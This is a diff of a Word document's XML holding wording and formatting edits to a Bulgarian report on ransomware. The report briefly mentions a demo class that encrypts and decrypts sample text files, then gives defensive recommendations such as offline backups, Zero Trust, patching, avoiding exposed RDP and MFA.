+      </w:r>
+      <w:r>
+        <w:t>не на</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> горепосочените три текстови файла.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7404,8 +7866,13 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">  }</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:br/>
         <w:t>}</w:t>
@@ -7425,10 +7892,16 @@
         <w:t>@Slf4j</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> за логване. Има четири константи описващи какви са файловете, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">директорията им, паролата и солта. Създава се инстанция и на </w:t>
+        <w:t xml:space="preserve"> за логване. Има четири константи</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> описващи какви са файловете, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">директорията им, паролата и солта. Създава се инстанция на </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -7456,7 +7929,22 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> сложи да намери трите текстови файла в </w:t>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">се </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ползва за намирането на</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> трите текстови файла в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7493,6 +7981,12 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -7504,7 +7998,33 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> извикват този метод и за всеки файл правят прочит, криптират или декриптират като презаписват съдържанието на файловете*.</w:t>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> извикват </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>getTxtFiles</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> метода </w:t>
+      </w:r>
+      <w:r>
+        <w:t>и за всеки файл правят прочит, криптират или декриптират като презаписват съдържанието на файловете*.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7543,7 +8063,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> клас, който няма да бъде разглеждан в демото.</w:t>
+        <w:t xml:space="preserve"> клас, който </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>не е разгледан</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в демото.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8270,6 +8808,9 @@
       </w:r>
       <w:r>
         <w:t>: Файловете са възстановени</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8549,47 +9090,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Настоящите препоръки за превенция и реакция при </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> атаки се базират на оперативния опит на организации като CISA, NSA, FBI и MS-ISAC. Насоките са предназначени както за ИТ специалисти, така и за лица, участващи в </w:t>
-      </w:r>
-      <w:r>
-        <w:t>изготвянето</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> на </w:t>
-      </w:r>
-      <w:r>
-        <w:t>полици</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>и процедури за реакция при киберинциденти.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
@@ -8614,157 +9114,341 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Поддръжка на офлайн криптирани </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Подготовката включва с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>ъздаване и поддържка</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> на офлайн криптирани </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>backups</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> на критично важната информация и често проверка на изправността на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>backup-a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. От съществено значение е резервният вариант да се поддържа офлайн</w:t>
-      </w:r>
-      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> на критично важната информация и чест</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> проверка на изправността на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>backup</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>. От съществено значение</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> backup</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> да се поддържа офлайн</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t xml:space="preserve">, понеже повечето </w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ransom</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> атаки опитват да намерят и изтрият или криптират резервни копия на системата. Така се принуждава жертвата да плати откупа</w:t>
-      </w:r>
-      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> атаки опитват да намерят и изтрият или криптират резервни</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>те</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> копия на системата. Така се принуждава жертвата да плати откупа. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Поддръжка и ъпдейт на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>images</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> на системата. Поддържането на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>image</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, които имат специфична преконфигурирана операционна система и свързаните с нея софтуерни приложения е важно, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>тъй като</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> по-лесно ще може да бъде възстановена системата и деплойната.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Поддържане на резервен хардуер, който да бъде използван при необходимост </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>за</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> възстановяване на системите. Това позволява по-бързо възстановяване на дейността, ако възстановяването на основната инфраструктура не е желано или не е възможно.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
+        <w:t>…</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Използване на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>multi-cloud solution</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е подходящо, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>защото</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> може да се съхранява важна информация или резервни копия на системата</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Това добавя</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> още един слой защита. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Multi-cloud</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е препоръчителен, тъй като намалява риска от </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vendor lock-in</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> или с други думи организацията не зависи само от един доставчик на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cloud</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
+      <w:r>
+        <w:t>В случай че всички акаунти или услуги при даден облачен доставчик бъдат компрометирани, наличието на резервна инфраструктура при алтернативен доставчик позволява по-бързо възстановяване на системите.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Поддръжка и ъпдейт на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>“golden” images</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> на системата. Поддържането на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>“image”</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, които имат специфична преконфигурирана операционна система и свързаните с нея софтуерни приложения е важно, понеже по-лесно ще може да бъде възстановена системата и деплойната, виртуална машина или сървър.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>П</w:t>
-      </w:r>
-      <w:r>
-        <w:t>оддържа</w:t>
-      </w:r>
-      <w:r>
-        <w:t>не на</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> резервен хардуер, който да бъде използван при необходимост от възстановяване на системите. Това позволява по-бързо възстановяване на дейността, ако възстановяването на основната инфраструктура не е желано или не е възможно.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Използване на</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> multi-cloud solution</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> е подходящо, понеже може да се съхранява важна информация или резервни копия на системата, като същевременно се добавя още един слой защита. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Multi-cloud</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> е препоръчителен, тъй като се намалява риска от </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>vendor lock-in</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> или с други думи организацията не зависи само от един доставчик на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">cloud. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>В случай че всички акаунти или услуги при даден облачен доставчик бъдат компрометирани, наличието на резервна инфраструктура при алтернативен доставчик позволява по-бързо възстановяване на системите.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-      </w:pPr>
-      <w:r>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t xml:space="preserve">Имплементация на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Zero Trust Architecture (ZTA)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> за превенция на неоторизиран достъп до данни и услуги. Достъпът до данните трябва да бъде възможно най-гранулярен. Тоест </w:t>
-      </w:r>
-      <w:r>
-        <w:t>необходимо е създаването на различни роли, които дават правомощия към определени данни и за определен срок. Така се избягва проблеми, където потребителите имат пълни правомощия към всяка една услуга. Свързването към частна мрежа не е достатъчно безопасно.</w:t>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> за превенция на неоторизиран достъп до данни и услуги.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Достъпът до данните трябва да бъде възможно най-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>гранулярен</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Тоест </w:t>
+      </w:r>
+      <w:r>
+        <w:t>необходимо е създаването на различни роли, които дават правомощия към определени данни и за определен срок. Така се избягва</w:t>
+      </w:r>
+      <w:r>
+        <w:t>т</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> проблеми, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>при които</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> потребителите имат пълни правомощия към всяка една услуга. Свързването към частна мрежа не е достатъчно безопасно.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Права се дават само при необходимост.</w:t>
@@ -8801,6 +9485,17 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
@@ -8837,31 +9532,62 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Не трябва да се разкриват услуги като </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t>Употребата на</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> услуги като </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Remote Desktop Protocol</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> в интернет. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t xml:space="preserve"> в интернет</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е силно непрепоръчителна</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Remote Desktop</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> представлява свързване на даден потребител към отдалечена среда през интернет. Ако по някаква причина такава услуга се налага е важно да се вземат превантивни мерки към често срещани </w:t>
+        <w:t xml:space="preserve"> представлява свързване на даден потребител към отдалечена среда през интернет. Ако </w:t>
+      </w:r>
+      <w:r>
+        <w:t>употребата на</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> услуга</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">та е наложително е </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">важно да се вземат превантивни мерки към често срещани </w:t>
       </w:r>
       <w:r>
         <w:t>първоначални векторни атаки</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> (фиг. 8)</w:t>
+        <w:t xml:space="preserve"> (фиг. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>24</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -8882,7 +9608,13 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">network </w:t>
+        <w:t>network</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>протоколи трябва да са забравени.</w:t>
@@ -8903,7 +9635,25 @@
         <w:t xml:space="preserve"> също е от ключово значение</w:t>
       </w:r>
       <w:r>
-        <w:t>. Особено сканове за тези устройства, които са свързани към интернета, за да се ограничи атаката.</w:t>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Особено сканове </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> тези устройства, които са свързани към интернета, за да се ограничи атаката.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -8912,12 +9662,15 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Чести ъпдейти и пачове на софтуера и операционната система към последните налични версии е също важно. Трябва да се приоритизира ъпдейти на </w:t>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Чести ъпдейти и пачове на софтуера и операционната система към последните налични версии е </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ключово</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Трябва да се приоритизира ъпдейти на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8934,8 +9687,21 @@
       <w:r>
         <w:t xml:space="preserve"> и плъгини. </w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Малкият и средният бизнес често имат такъв проблем с поддържка на актуализациите, поради липсва на отделен </w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Малкият и средният бизнес често имат проблем с поддържка</w:t>
+      </w:r>
+      <w:r>
+        <w:t>та</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на актуализациите, поради липсва на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8950,10 +9716,22 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> maintain</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> екипи.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>maintenance</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>отдел</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Едно решение е да се премине към </w:t>
@@ -8998,24 +9776,25 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>Също има</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> cloud providers</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> следи за уязвимости, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>пачва</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> системи и има защити против </w:t>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>loud providers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> следи</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> за уязвимости, пачва системи и има защити против </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9038,7 +9817,10 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Уверете се, че всички </w:t>
+        <w:t>Всички</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9059,10 +9841,40 @@
         <w:t>устройства</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> са правилно конфигурирани и функциите за сигурност са активирани.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Допълнително е необходимо да се спрат всички портове и протоколи, които не се предназначени за бизнес употреба</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">трябва да </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">са правилно конфигурирани и функциите за сигурност </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">да са </w:t>
+      </w:r>
+      <w:r>
+        <w:t>актив</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ни</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Н</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">еобходимо </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">е </w:t>
+      </w:r>
+      <w:r>
+        <w:t>да се спрат всички портове и протоколи, които не се предназначени за бизнес употреба</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9424,15 +10236,54 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Задължителна имплементация на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t>Задължителна имплементация на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Multi Factor Authentication</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>MFA</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> за всички услуги, особено имейли, </w:t>
       </w:r>
       <w:r>
@@ -9451,7 +10302,13 @@
         <w:t>MFA</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> или потребители, които не използват </w:t>
+        <w:t xml:space="preserve"> или </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">има </w:t>
+      </w:r>
+      <w:r>
